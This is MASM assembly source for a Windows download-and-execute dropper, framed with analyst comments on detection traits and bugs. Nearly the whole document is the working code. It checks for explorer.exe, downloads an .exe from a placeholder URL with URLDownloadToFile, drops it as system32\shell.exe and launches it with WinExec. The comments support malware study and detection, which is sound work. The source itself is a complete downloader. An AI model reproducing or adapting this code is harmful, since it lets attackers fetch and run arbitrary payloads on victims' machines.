;AntiDown.asm
;
; Analyst notes (defensive reading of this sample):
;   Entry (start) calls CheckFatherProcessID; a zero result exits immediately,
;   a non-zero result runs DownLoad, which fetches SourceFile via
;   URLDownloadToFile into DestFile (under system32), sleeps 2 s and launches
;   the file with WinExec. The process then exits.
;   Detection-relevant traits visible here: urlmon!URLDownloadToFile imported
;   by a tiny MASM binary, a hard-coded http URL to a ".exe", a write target
;   under system32 (presumably needs elevated rights to succeed), WinExec on the
;   downloaded path, and a Toolhelp32 process walk looking for "explorer.exe".
;   Assembled with MASM (.386 / flat / stdcall); MASM string literals do not
;   interpret "\\" as an escape, so DestFile holds doubled backslashes as written.
;
.386
.model flat,stdcall
option casemap : none
include windows.inc
include kernel32.inc
includelib kernel32.lib
include urlmon.inc
includelib urlmon.lib
include user32.inc
includelib user32.lib

DownLoad proto
CheckFatherProcessID proto

.data
SourceFile db "http://www.xxxxx.com/1.exe",0          ; download URL (placeholder host in this sample)
DestFile db "C:\\windows\\system32\\shell.exe",0      ; drop path; also the WinExec command line
szExplorer db "explorer.exe",0                        ; process name searched for in the snapshot
hProc dword 0                                         ; Toolhelp snapshot handle (global; the LOCAL form is commented out below)

.data?
dwFatherProcID DWORD ?                                ; th32ParentProcessID of the last matching entry
dwChildProcID DWORD ?                                 ; th32ProcessID of the last matching entry

.code
; ---------------------------------------------------------------------------
; Entry point: gate on CheckFatherProcessID, then download-and-run.
; ---------------------------------------------------------------------------
start:
; eax == 0 -> exit without doing anything
        invoke  CheckFatherProcessID
        .if (!eax)
        invoke  ExitProcess,0
        .endif
        invoke  DownLoad
        invoke  ExitProcess,0

; ---------------------------------------------------------------------------
; DownLoad: URLDownloadToFile(SourceFile -> DestFile), Sleep(2000), WinExec.
; In:    nothing
; Out:   eax = WinExec return value (never checked by the caller)
; Note:  neither the HRESULT of URLDownloadToFile nor the WinExec result is
;        tested, so a failed fetch still reaches WinExec on the stale path.
;        The LOCAL hInstance is declared but never used.
; ---------------------------------------------------------------------------
DownLoad proc
        LOCAL hInstance:DWORD
        invoke  URLDownloadToFile,NULL,addr SourceFile,addr DestFile,0,NULL
        invoke  Sleep,2000                                ; fixed delay before launch
        invoke  WinExec,addr DestFile,SW_SHOW
        ret
DownLoad endp

; ---------------------------------------------------------------------------
; CheckFatherProcessID: walk the process list, remember the PID / parent PID
; of entries whose name compares equal to szExplorer, then return
;   eax = 0  if dwFatherProcID == dwChildProcID   (caller exits)
;   eax = 1  otherwise                            (caller proceeds)
; Despite the name, the two values compared both come from the explorer.exe
; entry itself (its parent PID vs its own PID), not from this process's parent.
; If no entry ever matches, both globals keep their initial (presumably zero)
; contents from .data? and the routine returns 0 — i.e. "no explorer.exe
; found" ends the program; confirm against the loader's .bss handling.
; Clobbers: eax, ecx, edx (stdcall calls); ebx is saved/restored.
; ---------------------------------------------------------------------------
CheckFatherProcessID proc
;LOCAL hProc: HANDLE
        LOCAL pe: PROCESSENTRY32
        mov     pe.dwSize,sizeof PROCESSENTRY32
        invoke  CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
        mov     hProc,eax
        mov     eax,INVALID_HANDLE_VALUE
        .if eax == hProc
        xor     eax,eax
; ret                                   ; the early return is commented out, so an
;                                       ; invalid snapshot handle still falls through
;                                       ; into Process32First below
        .endif
        invoke  Process32First,hProc,addr pe
        .while (eax)
;invoke StrCmpi,addr szExplorer,addr pe.szExeFile
        invoke  lstrcmpi, szExplorer, pe.szExeFile     ; NOTE(review): no `addr` here, unlike the
                                                       ; commented line above — the operands are the
                                                       ; buffers' leading bytes, not their addresses;
                                                       ; how this assembles/behaves is not verifiable here
        .if (eax == 0)
        push    pe.th32ParentProcessID                 ; dwFatherProcID = pe.th32ParentProcessID
        pop     dwFatherProcID
        push    pe.th32ProcessID                       ; dwChildProcID  = pe.th32ProcessID
        pop     dwChildProcID
        .endif
        invoke  Process32Next,hProc,addr pe
        .endw
        invoke  CloseHandle,hProc
        push    ebx                                    ; ebx is callee-saved under stdcall
        mov     eax,dwFatherProcID
        mov     ebx,dwChildProcID
        .if eax == ebx
        xor     eax,eax                                ; equal -> 0 -> caller exits
        pop     ebx
        ret
        .else
        mov     eax,1                                  ; different -> 1 -> caller downloads
        pop     ebx
        ret
        .endif
        ret                                            ; unreachable: both branches above return
CheckFatherProcessID endp
end start